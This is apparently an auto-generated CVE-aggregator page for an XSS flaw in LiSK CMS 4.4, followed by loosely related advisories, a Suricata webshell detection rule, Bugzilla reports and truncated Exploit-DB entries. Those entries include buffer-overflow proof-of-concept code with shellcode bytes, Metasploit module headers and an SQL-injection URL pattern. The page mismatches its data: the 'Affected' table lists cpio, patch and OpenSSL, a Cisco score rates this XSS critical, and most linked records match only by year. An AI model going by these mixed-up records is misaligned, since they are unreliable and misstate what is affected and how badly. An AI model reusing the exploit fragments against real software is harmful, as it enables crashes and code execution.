CVE-2010-2014
published 2010-05-24CVE-2010-2014: Cross-site scripting (XSS) vulnerability in cp/list_content.php in LiSK CMS 4.4 allows remote attackers to inject arbitrary web script or HTML via the cl or…
PriorityP414medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EPSS
0.87%
54.3th percentile
Cross-site scripting (XSS) vulnerability in cp/list_content.php in LiSK CMS 4.4 allows remote attackers to inject arbitrary web script or HTML via the cl or possibly id parameter.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| createch-group | lisk_cms | — | — |
| gnu | cpio | >= 0 < 2.11+dfsg-1ubuntu1.1 | 2.11+dfsg-1ubuntu1.1 |
| gnu | patch | >= 0 < 2.7.1-4ubuntu2.3 | 2.7.1-4ubuntu2.3 |
| openssl | openssl | >= 0 < 1.0.1f-1ubuntu2.1 | 1.0.1f-1ubuntu2.1 |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
osv6.8MEDIUM
vendor_cisco10.0CRITICAL
vendor_redhat4.9MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fh55-j7vw-9cfq: Cross-site scripting (XSS) vulnerability in cp/list_content
ghsa_unreviewed·2022-05-17
CVE-2010-2014 [MEDIUM] CWE-79 GHSA-fh55-j7vw-9cfq: Cross-site scripting (XSS) vulnerability in cp/list_content
Cross-site scripting (XSS) vulnerability in cp/list_content.php in LiSK CMS 4.4 allows remote attackers to inject arbitrary web script or HTML via the cl or possibly id parameter.
OSV
patch vulnerabilities
osv·2015-06-22·CVSS 5.8
CVE-2010-4651 patch vulnerabilities
patch vulnerabilities
Jakub Wilk discovered that GNU patch did not correctly handle file paths in
patch files. An attacker could specially craft a patch file that could
overwrite arbitrary files with the privileges of the user invoking the program.
This issue only affected Ubuntu 12.04 LTS. (CVE-2010-4651)
László Böszörményi discovered that GNU patch did not correctly handle some
patch files. An attacker could specially craft a patch file that could cause a
denial of service. (CVE-2014-9637)
Jakub Wilk discovered that GNU patch did not correctly handle symbolic links in
git style patch files. An attacker could specially craft a patch file that
could overwrite arbitrary files with the privileges of the user invoking the
program. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10.
OSV
cpio vulnerabilities
osv·2015-01-08·CVSS 6.8
CVE-2014-9112 cpio vulnerabilities
cpio vulnerabilities
Michal Zalewski discovered an out of bounds write issue in the
process_copy_in function of GNU cpio. An attacker could specially
craft a cpio archive that could create a denial of service or possibly
execute arbitrary code. (CVE-2014-9112)
Jakob Lell discovered a heap-based buffer overflow in the rmt_read__
function of GNU cpio's rmt client functionality. An attacker
controlling a remote rmt server could use this to cause a denial of
service or possibly execute arbitrary code. This issue only affected
Ubuntu 10.04 LTS. (CVE-2010-0624)
OSV
openssl vulnerabilities
osv·2014-05-05·CVSS 4.0
CVE-2010-5298 openssl vulnerabilities
openssl vulnerabilities
It was discovered that OpenSSL incorrectly handled memory in the
ssl3_read_bytes() function. A remote attacker could use this issue to
possibly cause OpenSSL to crash, resulting in a denial of service.
(CVE-2010-5298)
It was discovered that OpenSSL incorrectly handled memory in the
do_ssl3_write() function. A remote attacker could use this issue to
possibly cause OpenSSL to crash, resulting in a denial of service.
(CVE-2014-0198)
Red Hat
kernel: kvm: reporting emulation failures to userspace
vendor_redhat·2014-09-24·CVSS 4.9
CVE-2014-7842 [MEDIUM] kernel: kvm: reporting emulation failures to userspace
kernel: kvm: reporting emulation failures to userspace
Race condition in arch/x86/kvm/x86.c in the Linux kernel before 3.17.4 allows guest OS users to cause a denial of service (guest OS crash) via a crafted application that performs an MMIO transaction or a PIO transaction to trigger a guest userspace emulation error report, a similar issue to CVE-2010-5313.
It was found that reporting emulation failures to user space could lead to either a local (CVE-2014-7842) or a L2->L1 (CVE-2010-5313) denial of service. In the case of a local denial of service, an attacker must have access to the MMIO area or be able to access an I/O port. Please note that on certain systems, HPET is mapped to userspace as part of vdso (vvar) and thus an unprivileged user may generate MMIO transactions (and enter t
Red Hat
kernel: kvm: reporting emulation failures to userspace
vendor_redhat·2014-09-24·CVSS 4.9
CVE-2010-5313 [MEDIUM] kernel: kvm: reporting emulation failures to userspace
kernel: kvm: reporting emulation failures to userspace
Race condition in arch/x86/kvm/x86.c in the Linux kernel before 2.6.38 allows L2 guest OS users to cause a denial of service (L1 guest OS crash) via a crafted instruction that triggers an L2 emulation failure report, a similar issue to CVE-2014-7842.
It was found that reporting emulation failures to user space could lead to either a local (CVE-2014-7842) or a L2->L1 (CVE-2010-5313) denial of service. In the case of a local denial of service, an attacker must have access to the MMIO area or be able to access an I/O port. Please note that on certain systems, HPET is mapped to userspace as part of vdso (vvar) and thus an unprivileged user may generate MMIO transactions (and enter the emulator) this way.
Statement: This issue did not af
Cisco
Multiple Vulnerabilities in OpenSSL Affecting Cisco Products
vendor_cisco·2014-06-05·CVSS 10.0
CVE-2010-5298 [CRITICAL] Multiple Vulnerabilities in OpenSSL Affecting Cisco Products
Multiple Vulnerabilities in OpenSSL Affecting Cisco Products
Multiple Cisco products incorporate a version of the OpenSSL package affected by one or more vulnerabilities that could allow an unauthenticated, remote attacker to execute arbitrary code, create a denial of service (DoS) condition, or perform a man-in-the-middle attack. On June 5, 2014, the OpenSSL Project released a security advisory detailing seven distinct vulnerabilities. The vulnerabilities are referenced in this document as follows:
SSL/TLS Man-in-the-Middle Vulnerability
DTLS Recursion Flaw Vulnerability
DTLS Invalid Fragment Vulnerability
SSL_MODE_RELEASE_BUFFERS NULL Pointer Dereference Vulnerability
SSL_MODE_RELEASE_BUFFERS Session Injection or Denial of Service Vulnerability
Anonymous ECDH Denial of Service Vulnerab
Cisco
Multiple Vulnerabilities in OpenSSL Affecting Cisco Products
vendor_cisco
CVE-2010-5298 Multiple Vulnerabilities in OpenSSL Affecting Cisco Products
CVE-2010-5298: Multiple Vulnerabilities in OpenSSL Affecting Cisco Products
Multiple Cisco products incorporate a version of the OpenSSL package affected by one or more vulnerabilities that could allow an unauthenticated, remote attacker to execute arbitrary code, create a denial of service (DoS) condition, or perform a man-in-the-middle attack. On June 5, 2014, the OpenSSL Project released a security advisory detailing seven distinct vulnerabilities. The vulnerabilities are referenced in this document as follows: SSL/TLS Man-in-the-Middle Vulnerability DTLS Recursion Flaw Vulnerability DTLS Invalid Fragment Vulnerability SSL_MODE_RELEASE_BUFFERS NULL Pointer Dereference Vulnerability SSL_MODE_RELEASE_BUFFERS Session Injection or Denial of Service Vulnerability Anonymous ECDH Denial of Ser
Suricata
ET WEB_SERVER WEBSHELL CFM Shell Access
suricata·2014-03-18
CVE-2010-2861 ET WEB_SERVER WEBSHELL CFM Shell Access
ET WEB_SERVER WEBSHELL CFM Shell Access
Rule: alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"ET WEB_SERVER WEBSHELL CFM Shell Access"; flow:established,to_client; file.data; content:"CFM shell"; nocase; reference:url,blog.spiderlabs.com/2014/03/coldfusion-admin-compromise-analysis-cve-2010-2861.html; classtype:successful-admin; sid:2018290; rev:3; metadata:created_at 2014_03_18, signature_severity Major, updated_at 2024_03_13;)
Exploit-DB
Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash (PoC)
exploitdb·2015-04-17·CVSS 4.6
CVE-2015-2572 [MEDIUM] Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash (PoC)
Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash (PoC)
---
# Exploit Title: Buffer Overflow in Oracle� Hyperion Smart View for Office
[DOS]
# Exploit Author: sajith
# Vendor Homepage: http://oracle.com
# vulnerable Version: Fusion Edition 11.1.2.3.000 Build 157
#Vulnerable Link:
http://www.oracle.com/technetwork/middleware/smart-view-for-office/downloads/index.html
# Tested in: Microsoft Windows 7 Enterprise 6.1.7601 Service Pack 1
[x64],en-us
#plugin tested with Microsoft Excel 2010
#CVE: CVE-2015-2572
Responsible Disclosure:
Reported to Oracle on Jul 7, 2014
patch released on April 14, 2015
How to reproduce the bug?
1)install "Smart view" and open Microsoft excel and click on "smart view"
tab
2)click on "Options" and then click on "Advanced" tab
3) In General menu in "
Exploit-DB
BulletProof FTP Client - BPS Buffer Overflow (Metasploit)
exploitdb·2015-01-06
CVE-2014-2973 BulletProof FTP Client - BPS Buffer Overflow (Metasploit)
BulletProof FTP Client - BPS Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'BulletProof FTP Client BPS Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
BulletProof FTP Client 2010, caused by an overly long hostname.
By persuading the victim to open a specially-crafted .BPS file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gabor Seljan'
],
'References' =>
[
[ 'EDB', '34162' ],
[ 'EDB', '34540' ],
[ 'EDB', '35449' ],
[
Exploit-DB
BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)
exploitdb·2014-12-03·CVSS 9.3
CVE-2014-2973 [CRITICAL] BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)
BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)
---
#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass stack size limitation for bigger payload. Allocate 2nd
# shellcode in heap and copy back to stack. This exploit use egghunter
# to locate 2nd shellcode in heap and copy to stack using memcpy function.
# Offset
seh = 93
filename = "xsession.bps"
buff = "A" * 400
# ./msfvenom -p windows/messagebox TEXT="Hello Exploit-DB" EXITFUNC=process -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Local Buffer Overflow (SEH)
exploitdb·2014-11-26
CVE-2014-9448 Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Local Buffer Overflow (SEH)
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Local Buffer Overflow (SEH)
---
#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli
# Vendor Homepage: not valid anymore
# Software Link: not available
# Version: 3.1.2.1.2010.03.30
# Discovery: ZoRLu / [email protected]
# Tested on: Microsoft Windows XP [Version 5.1.2600]
filename = "3-1-2-1-gb.wax"
seh = 43501
buff = "\x41" * 45000
nops = "\x90" * 16
# ./msfvenom -p windows/exec CMD=calc EXITFUNC=thread -b "\x00\x0a\x0d\x0c\x20" -e x86/shikata_ga_nai -f ruby
sc =
"\xbe\x97\xd4\x64\xe7\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x72\x0e\x03\xe5\xda\x86\x12\xf5" +
"\x0b\xcf\xdd\x05\xcc\xb0\x
Exploit-DB
Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
exploitdb·2014-11-12·CVSS 7.8
CVE-2014-6352 [HIGH] Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
---
#
# Full exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35216.rar
#
#CVE-2014-6352 OLE Remote Code Execution
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Advanced Hacking Trainings - http://training.aslitsecurity.com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Tested on win7 - office 2007 and 2010. The exploit will not give UAC warning the user account is administrator. Else there will be a UAC warning.
#No .inf file is required in this exploit
#The size of executable payload should be less than 400kb
#python 2.7 required
#The folder "temp" should be in same dir as this python file.
# usage - python.exe
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite
exploitdb·2014-10-29
CVE-2014-9448 Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite
---
#EDB Note: DoS - b0f isn't working.
# Title : Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) Buffer Overflow
# Author : ZoRLu / [email protected] / [email protected]
# Home : http://milw00rm.com / its online
# Date : 28.10.2014
# Python : V 2.7
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
my $file = "exploit.wax"; #dont change file name if change file name you must change $filepath
my $junk = "\x41" x 43516;
my $eip = "\xC3\x9c\xC8\x75"; #75C89CC3 JMP ESP | bad char: \x09\x0a
my $oyala = "\x90" x 100;
#tested on my windows 7 ultimate for file name "exploit.wax" if its not true path your windows you can change
Exploit-DB
Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
exploitdb·2014-10-20
CVE-2014-6352 Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows
Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be
vulnerable. However, based on our testing, the most reliable setup is on Windows platforms
running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such
as using
Exploit-DB
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
exploitdb·2014-09-29
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
---
# Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability
# Google Dork: NA
# Date: 08/01/2014
# Exploit Author: Nate Power
# Vendor Homepage: microsoft.com
# Software Link: NA
# Version: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# Tested on: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# CVE : NA
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure',
'Description' => %q{
This module tests vulnerable IIS HTTP header file paths on Microsoft Exchange OWA 2003, CAS 2007, 2010, 201
Exploit-DB
BulletProof FTP Client 2010 - Buffer Overflow (SEH)
exploitdb·2014-09-05·CVSS 9.3
CVE-2014-2973 [CRITICAL] BulletProof FTP Client 2010 - Buffer Overflow (SEH)
BulletProof FTP Client 2010 - Buffer Overflow (SEH)
---
# !/usr/bin/python
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit #
# Date: Sep 05 2014 #
# Vulnerability Discovery: Gabor Seljan #
# Exploit Author: Robert Kugler #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP #
# CVE: CVE-2014-2973 #
# #
# Thanks to corelanc0d3r for his awesome tutorials and help! ;-) #
# The "Enter URL" form is also vulnerable #
#-----------------------------------------------------------------------------#
buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
buffer+= "\x20" + "\x90" * 89
buffer+= "\xeb\x06\x90\x90"
Exploit-DB
BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)
exploitdb·2014-07-24·CVSS 9.3
CVE-2014-2973 [CRITICAL] BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)
BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)
---
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Jul 24 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 #
# CVE: CVE-2014-2973 #
#-----------------------------------------------------------------------------#
'''
(a00.9e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a
eip=005c005b esp=0012f594 ebp=0012f610 iopl=0 nv up ei pl zr na pe nc
cs=001
Exploit-DB
Jzip - Buffer Overflow (PoC) (SEH Unicode)
exploitdb·2014-04-16
CVE-2010-5300 Jzip - Buffer Overflow (PoC) (SEH Unicode)
Jzip - Buffer Overflow (PoC) (SEH Unicode)
---
#!/usr/bin/python
######################################################
# Exploit title: seh unicode buffer overflow (DOS)
# Date: 16/04/2014
# Exploit Author: motaz reda [motazkhodair[at]gmail.com]
# Software Link : http://www.jzip.com/
# Version: jZip v2.0.0.132900
# Tested On: Windows 7 ultimate
########################################################
import sys, os
filename = "vuln.zip"
buffer = "\x50\x4B\x03\x04\x14\x00\x00"
buffer += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
buffer += "\x00\x00\x00\x00\x00\x00\x00\x00"
buffer += "\xe4\x0f"
buffer += "\x00\x00\x00"
eo = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eo += "\x12\x10\x00\x00"
eo += "\x02\x10\x00\x00"
eo += "\x00\x00"
cdf = "\x50\x4B\x01\x02\x14\x00\x14"
cdf +=
Exploit-DB
SmartCMS 2 - SQL Injection
exploitdb·2010-05-04
CVE-2014-9558 SmartCMS 2 - SQL Injection
SmartCMS 2 - SQL Injection
---
============ { Ariko-Security - Advisory #1/5/2010 } =============
SQL injection vulnerability in SmartCMS v.2
Vendor's Description of Software:
# http://www.smartwebsites.com.cy/index.php?pageid=13〈=en
Dork:
# n/a
Application Info:
# Name: SmartCMS
# Versions: V.2
Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: medium
Fix:
# N/A
Time Table:
# 22/04/2010 - Vendor notified.
Input passed via the "pageid" ,"lang" parameters to index.php is not
properly sanitised before being used in a SQL query.
Solution:
# Input validation of "pageid","lang" parameters should be corrected.
Vulnerability:
# http://[site]/index.php?pageid=[SQLi]〈=[SQLi]
Credit:
# Discoverd By: MG
#Advisory:
http://www.ariko-security.com/apr2010/audyt_bezpieczenstw
Bugzilla
CVE-2010-5304 realvnc: Null pointer dereference flaw in ClientCutText message handling
bugzilla·2020-02-19·CVSS 7.5
CVE-2010-5304 [HIGH] CVE-2010-5304 realvnc: Null pointer dereference flaw in ClientCutText message handling
CVE-2010-5304 realvnc: Null pointer dereference flaw in ClientCutText message handling
A NULL pointer dereference flaw was found in the way LibVNCServer before 0.9.9 handled certain ClientCutText message. A remote attacker could use this flaw to crash the VNC server by sending a specially crafted ClientCutText message from a VNC client.
Reference:
http://www.openwall.com/lists/oss-security/2014/09/23/6
This libVNCServer flaw was assigned CVE-2014-6053. A similar flaw was found in RealVNC server which has been assigned CVE-2010-5304.
Discussion:
https://packetstormsecurity.com/files/89160/RealVNC-VNC-Server-Free-Edition-4.1.3-Denial-Of-Service.html contains instructions for reproducing this flaw.
---
External References:
https://packetstormsecurity.com/files/89160/RealVNC-VNC-Server
Bugzilla
CVE-2010-5313 CVE-2014-7842 kernel: kvm: reporting emulation failures to userspace
bugzilla·2014-11-13·CVSS 4.9
CVE-2010-5313 [MEDIUM] CVE-2010-5313 CVE-2014-7842 kernel: kvm: reporting emulation failures to userspace
CVE-2010-5313 CVE-2014-7842 kernel: kvm: reporting emulation failures to userspace
It was found that reporting emulation failures to user space can lead to either
local (CVE-2014-7842) or L2->L1 (CVE-2010-5313) DoS.
In the case of local DoS attacker needs access to MMIO area or be able to
generate port access. Please note that on certain systems HPET is mapped
to userspace as part of vdso (vvar) and thus an unprivileged user may
generate MMIO transactions (and enter the emulator) this way.
Upstream patches:
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=fc3a9157d314
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a2b9e6c1a35a
Acknowledgements:
Red Hat would like to thank Nadav Amit for reporting this issue.
Discussion:
Created
Bugzilla
CVE-2014-0205 kernel: futex: refcount issue in case of requeue
bugzilla·2014-05-05·CVSS 6.9
CVE-2014-0205 [MEDIUM] CVE-2014-0205 kernel: futex: refcount issue in case of requeue
CVE-2014-0205 kernel: futex: refcount issue in case of requeue
A flaw was found in the way the Linux kernel's futex subsystem handled
reference counting in case of futex requeue during futex_wait().
An unprivileged local user could use this flaw to crash the system or,
potentially, escalate their privileges on the system by overputting
reference counter on either inode or mm that backs up the memory area of
the futex, leading to use-after-free.
References:
https://lkml.org/lkml/2010/9/16/99
Upstream fix:
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=7ada876a8703f23befbb20a7465a702ee39b1704
Acknowledgements:
The security impact of this issue was discovered by Mateusz Guzik of Red Hat.
Discussion:
Statement:
This issue does not affect the Linux kernel pac
Bugzilla
CVE-2010-5298 openssl: freelist misuse causing a possible use-after-free
bugzilla·2014-04-14·CVSS 4.0
CVE-2010-5298 [MEDIUM] CVE-2010-5298 openssl: freelist misuse causing a possible use-after-free
CVE-2010-5298 openssl: freelist misuse causing a possible use-after-free
The following security advisory was reported by OpenBSD:
OpenBSD 5.4 errata 8, Apr 12, 2014: A use-after-free race condition in OpenSSL's read buffer may permit an attacker to inject data from one connection into another.
Reference:
http://ftp.openbsd.org/pub/OpenBSD/patches/5.4/common/008_openssl.patch
http://www.tedunangst.com/flak/post/analysis-of-openssl-freelist-reuse
Discussion:
Analysis:
openssl does its own memory management and maintains a LIFO freelist of buffers available.
In ssl3_read_bytes(), it released buffer even if there is some data available inside it.
Later in s3_pkt.c:1058, ssl3_release_read_buffer() is called to allocate another buffer. In a single threaded application the same buffer wo
2010-05-24
Published